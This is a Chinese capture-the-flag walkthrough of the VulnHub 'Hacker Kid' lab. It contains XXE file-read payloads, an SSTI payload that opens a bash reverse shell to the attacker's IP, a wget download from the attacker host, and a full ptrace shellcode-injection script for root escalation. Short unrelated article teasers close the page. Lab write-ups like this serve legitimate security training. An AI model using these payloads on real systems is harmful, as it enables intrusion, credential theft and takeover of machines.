HACKER KID: 1.0.1实战演练

news2025/1/13 8:04:28

文章目录

      • HACKER KID: 1.0.1实战演练
          • 一、前期准备
            • 1、相关信息
          • 二、信息收集
            • 1、端口扫描
            • 2、访问网站
            • 3、扫描目录
            • 4、查看源码
            • 5、请求参数
            • 6、burpsuite批量请求
            • 7、编辑hosts文件
            • 8、DNS区域传输
            • 9、编辑hosts
            • 10、访问网站
            • 11、注册账号
            • 12、burpsuite抓包
            • 13、XML注入
            • 14、解密
            • 15、登录网站的9999端口
            • 16、提交参数
            • 17、监听
          • 三、提权
            • 1、查找具有Capabilities特殊操作权限的程序
            • 2、创建源码文件
            • 3、开机本地开启http服务
            • 4、下载脚本
            • 5、查看以root运行的进程
            • 6、执行脚本
            • 7、查看端口是否开放
            • 8、连接端口

HACKER KID: 1.0.1实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/hacker-kid-101,719/

设备名称IP地址
攻击机:kali192.168.0.109
靶机:Hacker kid: 1.0.1192.168.0.103
二、信息收集
1、端口扫描
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.0.103
//开放DNS:53端口、WEB:80端口、9999端口
//DNS:53端口版本号ISC BIND 9.16.1
//WEB:80端口中间件为Apache-httpd 2.4.41
//MySQL:3306端口版本号为Tornado httpd 6.1

在这里插入图片描述

2、访问网站
http://192.168.0.103/
翻译为:
你给我起了一个“臭名昭著的黑客”的名字!!就因为我黑了你的整个服务器。
现在我可以访问你的整个服务器了。如果你足够聪明,可以取回它,就给我看看。
“你越挖我,你就会在你的服务器上找到我。挖我…挖我更多”

在这里插入图片描述

http://192.168.0.103/index.html
//无法访问,返回404

在这里插入图片描述

http://192.168.0.103/#app.html
//发现出现一个#符号,页面没有变化

在这里插入图片描述

http://192.168.0.103/app.html
//功能没法使用

在这里插入图片描述

http://192.168.0.103/#form.html
//发现出现一个#符号,页面没有变化

在这里插入图片描述

http://192.168.0.103/form.html

在这里插入图片描述

3、扫描目录
┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.168.0.103   

在这里插入图片描述

4、查看源码
view-source:http://192.168.0.103/index.php
//使用GET提交page_no请求新的页面

在这里插入图片描述

5、请求参数
http://192.168.0.103/index.php?page_no=1
//有回显,批量测试

在这里插入图片描述

6、burpsuite批量请求

在这里插入图片描述

在这里插入图片描述

//原文为:
Okay so you want me to speak something ?
I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!
Out of my many homes...one such home..one such home for me : hackers.blackhat.local
//翻译为:
好吧,你想让我说点什么?
我是一个黑客孩子,而不是一个愚蠢的黑客。所以我创建了一些子域,以便随时返回服务器!!
在我的许多家里。。。一个这样的家。。对我来说就是这样一个家:hackers.blackhat.local

在这里插入图片描述

7、编辑hosts文件
┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/hosts 
//添加192.168.0.103   hackers.blackhat.local

在这里插入图片描述

8、DNS区域传输
┌──(kali㉿kali)-[~]
└─$ dig axfr @192.168.0.103 blackhat.local

在这里插入图片描述

9、编辑hosts
┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/hosts  

在这里插入图片描述

10、访问网站
http://hackerkid.blackhat.local/
//发现一个注册界面

在这里插入图片描述

11、注册账号
//提示邮箱错误

在这里插入图片描述

12、burpsuite抓包
//发现是XML传输数据的

在这里插入图片描述

13、XML注入
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
<root>
    <name>kali</name>
    <tel>13911111111</tel>
    <email>&xxe;</email>
    <password>123456</password>
</root>

在这里插入图片描述

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY  xxe  SYSTEM   "php://filter/convert.base64-encode/resource=/home/saket/.bashrc"  >]>   
<root>
    <name>kali</name>
    <tel>13911111111</tel>
    <email>&xxe;</email>
    <password>123456</password>
</root>

在这里插入图片描述

14、解密
//账号:admin
//密码:Saket!#$%@!!

在这里插入图片描述

15、登录网站的9999端口
http://192.168.0.103:9999/login?next=%2F
//账号:saket,密码:Saket!#$%@!!
//原文为:
Tell me your name buddy
How can i get to know who are you ??
//翻译为:
告诉我你的名字,伙计
我怎么才能知道你是谁?? 

在这里插入图片描述

在这里插入图片描述

16、提交参数
//编码前:
{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.0.109/4444 0>&1"')}}
//编码后:
%7B%25%20import%20os%20%25%7D%7B%7Bos.system('bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.0.109%2F4444%200%3E%261%22')%7D%7D

在这里插入图片描述

17、监听
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444      

在这里插入图片描述

三、提权
1、查找具有Capabilities特殊操作权限的程序
saket@ubuntu:~$ /usr/sbin/getcap -r / 2>/dev/null 

在这里插入图片描述

2、创建源码文件
# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.
# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c 
 
import ctypes
import sys
import struct
 
# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.html
 
PTRACE_POKETEXT   = 4
PTRACE_GETREGS    = 12
PTRACE_SETREGS    = 13
PTRACE_ATTACH     = 16
PTRACE_DETACH     = 17
 
# Structure defined in <sys/user.h>
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct
 
class user_regs_struct(ctypes.Structure):
    _fields_ = [
        ("r15", ctypes.c_ulonglong),
        ("r14", ctypes.c_ulonglong),
        ("r13", ctypes.c_ulonglong),
        ("r12", ctypes.c_ulonglong),
        ("rbp", ctypes.c_ulonglong),
        ("rbx", ctypes.c_ulonglong),
        ("r11", ctypes.c_ulonglong),
        ("r10", ctypes.c_ulonglong),
        ("r9", ctypes.c_ulonglong),
        ("r8", ctypes.c_ulonglong),
        ("rax", ctypes.c_ulonglong),
        ("rcx", ctypes.c_ulonglong),
        ("rdx", ctypes.c_ulonglong),
        ("rsi", ctypes.c_ulonglong),
        ("rdi", ctypes.c_ulonglong),
        ("orig_rax", ctypes.c_ulonglong),
        ("rip", ctypes.c_ulonglong),
        ("cs", ctypes.c_ulonglong),
        ("eflags", ctypes.c_ulonglong),
        ("rsp", ctypes.c_ulonglong),
        ("ss", ctypes.c_ulonglong),
        ("fs_base", ctypes.c_ulonglong),
        ("gs_base", ctypes.c_ulonglong),
        ("ds", ctypes.c_ulonglong),
        ("es", ctypes.c_ulonglong),
        ("fs", ctypes.c_ulonglong),
        ("gs", ctypes.c_ulonglong),
    ]
 
libc = ctypes.CDLL("libc.so.6")
 
pid=int(sys.argv[1])
 
# Define argument type and respone type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64
 
# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers=user_regs_struct()
 
# Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))
 
print("Instruction Pointer: " + hex(registers.rip))
 
print("Injecting Shellcode at: " + hex(registers.rip))
 
# Shell code copied from exploit db.
shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
 
# Inject the shellcode into the running process byte by byte.
for i in xrange(0,len(shellcode),4):
 
  # Convert the byte to little endian.
  shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)
  shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
  shellcode_byte=int(shellcode_byte_little_endian,16)
 
  # Inject the byte.
  libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)
 
print("Shellcode Injected!!")
 
# Modify the instuction pointer
registers.rip=registers.rip+2
 
# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))
 
print("Final Instruction Pointer: " + hex(registers.rip))
 
# Detach from the process.
libc.ptrace(PTRACE_DETACH, pid, None, None)
3、开机本地开启http服务
┌──(kali㉿kali)-[~]
└─$ python -m http.server 8080

在这里插入图片描述

4、下载脚本
saket@ubuntu:~$ wget http://192.168.0.109:8080/inject.py

在这里插入图片描述

5、查看以root运行的进程
saket@ubuntu:~$ ps -aef | grep root

在这里插入图片描述

6、执行脚本
saket@ubuntu:~$ python2.7 inject.py 670

在这里插入图片描述

7、查看端口是否开放
saket@ubuntu:~$ netstat -ano | grep 5600
//如果端口没打开,可以重新选择进程号

在这里插入图片描述

8、连接端口
┌──(kali㉿kali)-[~]
└─$ nc 192.168.0.103 5600

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/590032.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

供应链对于小程序、app等平台能带来什么好处?

供应链对于小程序、 app等平台的重要性不言而喻&#xff0c;这是一个企业生存的根本&#xff0c;只有保证了供应链&#xff0c;才能获得足够的产品和服务&#xff0c;保证企业能够长期稳定发展。因此很多企业都开始重视供应链&#xff0c;同时也在为之努力。 那么&#xff0c;…

gradle环境的spring boot搭建

天行健&#xff0c;君子以自强不息&#xff1b;地势坤&#xff0c;君子以厚德载物。 每个人都有惰性&#xff0c;但不断学习是好好生活的根本&#xff0c;共勉&#xff01; 文章均为学习整理笔记&#xff0c;分享记录为主&#xff0c;如有错误请指正&#xff0c;共同学习进步。…

tensorrt yolov7 推理

参考 源码修改如下&#xff1a;如果将源代码cpp/norm/yolo.hpp修改为自己训练的数据时修改如下&#xff1a; class YOLO{ const char* INPUT_BLOB_NAME "images"; const char* OUTPUT_BLOB_NAME "output"; }根据自己转换onnx模型采用netron打开查看 输入…

(2022,MoCA)Few-shot 图像生成的原型记忆(Prototype Memory)和注意力机制

Prototype Memory and Attention Mechanisms for Few Shot Image Generation 公众号&#xff1a;EDPJ 目录 0. 摘要 1. 简介 2. 相关工作 3. 方法 3.1 原型记忆学习 3.2 记忆概念注意力&#xff08;MEMORY CONCEPT ATTENTION&#xff0c;MoCA&#xff09; 3.3 空间上…

自平衡二叉树(AVL)及四种旋转方式详解

推荐可视化插入、删除节点的二叉树网站&#xff1a;AVL Tree Visualzation (usfca.edu) 1. 概述 AVL树是一种自平衡二叉搜索树&#xff0c;他是搜索二叉树(BST)的优化&#xff0c;它在每次插入或删除操作后&#xff0c;通过旋转节点来保持树的平衡性。AVL树的平衡条件是任意节…

代码随想录算法训练营第三十八天 | 力扣 509. 斐波那契数, 70. 爬楼梯, 746. 使用最小花费爬楼梯

509. 斐波那契数 题目 509. 斐波那契数 斐波那契数 &#xff08;通常用 F(n) 表示&#xff09;形成的序列称为 斐波那契数列 。该数列由 0 和 1 开始&#xff0c;后面的每一项数字都是前面两项数字的和。也就是&#xff1a; F(0) 0&#xff0c;F(1) 1 F(n) F(n - 1) F(…

几种经典算法

1.分治法 分治法也叫做分而治之法。核心思想是将一个难以直接解决的大问题依照相同的概念分割成两个或者多个相同的小问题&#xff0c;以便各个击破。 如图所示&#xff1a; 2.递归法 递归法和分而治之法像一对孪生兄弟&#xff0c;都是将一个复杂的算法问题进行分解&#x…

【JAVAWEB】CSS

目录 1.CSS是什么 2.基本语法规范 3.引入方式 3.1内部样式表 3.2行内样式表 3.3外部样式 4.代码风格 4.1样式风格 4.2样式大小写 4.3空格规范 5.选择器 5.1选择器的功能 5.2选择器的种类 1.基础选择器 2.复合选择器 6.常用元素属性 6.1字体属性 设置字体font-…

配置静态ip

1.切换到root用户&#xff08;当前永久&#xff0c;不是5分钟权限失效那种&#xff09; su root #普通用户切换到root用户 2.cd到网络配置文件夹network-scripts目录下 cd /etc/sysconfig/network-scripts ls #ls查看文件目录 #找到ifcfg-exx这个格式的文件&#xff0c;我这…

IIC总线协议的死锁问题

目录 1. IIC的特性 2. IIC死锁问题分析 3. 常见的IIC死锁问题解决方法 1. IIC的特性 IIC协议是一个允许一主多从通信的协议&#xff0c;只能用于短距离通信&#xff0c;并且只需要两根信号线来交换信息。 IIC的两根信号是SCL和SDA&#xff0c;SCL是时钟信号线&#xff0c;S…

【Linux】多线程01 --- 理解线程 线程控制及封装

&#x1f34e;作者&#xff1a;阿润菜菜 &#x1f4d6;专栏&#xff1a;Linux系统编程 目录 一、线程概念 -- 理解线程与进程的区别和联系1. 再次理解用户级页表和进程地址空间2.理解Linux的轻量级进程3. 线程的属性4.线程的优点和缺点二、线程的控制 --- 学学接口使用 一、线程…

企业级帮助中心编写方案

随着互联网的飞速发展&#xff0c;越来越多的企业开始将客户服务转向线上服务。在这个过程中&#xff0c;企业级帮助中心因其高效的自助服务和低成本的维护方式受到越来越多企业的青睐。下文将从如何编写一个高质量的企业级帮助中心入手&#xff0c;为您介绍具体步骤。 一、明…

架构愿景: 构建良好软件的关键

在产品开发生命周期的各个阶段&#xff0c;牢记架构愿景&#xff0c;始终坚持每个决策都符合愿景原则&#xff0c;是避免架构腐化的唯一方式。原文: Architecture Vision — A critical ingredient in building well-maintained software 上一篇文章《软件架构: 一切皆有代价》…

华为OD机试真题B卷 Java 实现【字符串通配符】,附详细解题思路

一、题目描述 问题描述&#xff1a;在计算机中&#xff0c;通配符一种特殊语法&#xff0c;广泛应用于文件搜索、数据库、正则表达式等领域。现要求各位实现字符串通配符的算法。 要求&#xff1a; 实现如下2个通配符&#xff1a; &#xff1a;匹配0个或以上的字符&#xf…

“国风顶流”霸王茶姬,眺望书画诗酒的远方

一杯来自云南的原叶鲜奶茶&#xff0c;如何征服消费者的胃和心&#xff1f; 茶饮赛道素来竞争激烈&#xff0c;十年时间&#xff0c;行业从鲜奶茶卷到奶盖茶、水果茶、多料奶茶等一个又一个新品类。茶饮品牌如雨后春笋般涌现&#xff0c;甚至不少咖啡品牌都跨界而来&#xff0…

【新星计划回顾】第三篇学习计划-分页和排名函数的运用

&#x1f3c6;&#x1f3c6;今天是【全国科技者工作日】&#xff0c;在这个特别的日子里&#xff0c;自然要写篇文章&#xff01; 最近这段时间非常忙&#xff0c;虽然导师首次参与新星计划活动已经在4月16日圆满结束&#xff0c;早想腾出时间来好好整理活动期间分享的知识点。…

实战一个react(0-1)项目

文章目录 1. 安装2. 完成一个组件开发3. 添加路由3. 引入element-react1. 运行发现报错./node_modules/element-react/dist/npm/es5/src/locale/format.js2. 接着又报错The <Router /> component appears to be a function component that returns a class instance. Cha…

ABP VNext认证授权获取Token

ABP VNext认证授权获取Token 1.Password授权方式获取1.1 请求说明1.2 请求示例1.3 请求参数 2.authorization_code模式获取2.1 无认证授权&#xff0c;跳转至授权认证中心2.2 用户密码登录2.3 登录成功&#xff0c;服务器会跳转至redirect_url所指地址 1.Password授权方式获取 …

vue-kindeditor 安装和解决问题

效果图 kindeditor 引入 一、去官网下载 kindeditor 包 官方链接 二、在vue里的static文件夹下 创建一个 文件夹名字叫 kindeditor&#xff0c; 把下载好的文件放在这里 三、在 公共组件 components 下 创建kindeditor.vue 文件 <template><div class"kindedit…

拿到字节跳动奖学金,入职字节跳动做科研,他们经历了什么?

前不久&#xff0c;第三届字节跳动奖学金计划已经正式启动。 自 2021 年起&#xff0c;字节跳动奖学金计划已经完成了两届评选&#xff0c;共有 19 位优秀学子荣获每人 10 万元人民币的奖学金。 在奖学金支持下&#xff0c;他们获得了新的科研项目费用、学术交流机会&#xff0…